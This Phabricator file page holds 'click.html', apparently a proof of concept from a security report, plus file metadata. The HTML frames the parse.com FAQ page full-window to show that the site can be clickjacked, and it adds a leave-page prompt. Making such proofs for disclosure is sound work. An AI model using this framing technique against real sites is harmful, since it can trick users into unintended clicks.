Page MenuHomePhabricator
Authored By
p0y3r
Aug 23 2015, 2:40 PM
Size
453 B
Referenced Files
None
Subscribers
None

click.html

<html><head>
<title> click</title>
<style>
frame {
opacity: 0.5;
border: none;
position: absolute;
top: 0px;
left: 0px;
z-index: 1000;
}
</style>
</head>
<body>
<script>
window.onbeforeunload = function()
{
return " Do you want to leave ?";
}
</script>
<p> site is vulnerable for clickjacking! by Vineet bhardwaj</p>
<iframe id="frame" width="100%" height="100%" src="https://www.parse.com/plans/faq"></iframe>
</body>
</html>

File Metadata

Mime Type
text/html
Storage Engine
amazon-s3
Storage Format
Raw Data
Storage Handle
phabricator/dj/g2/r3davueqpehemr6k
Default Alt Text
click.html (453 B)

Event Timeline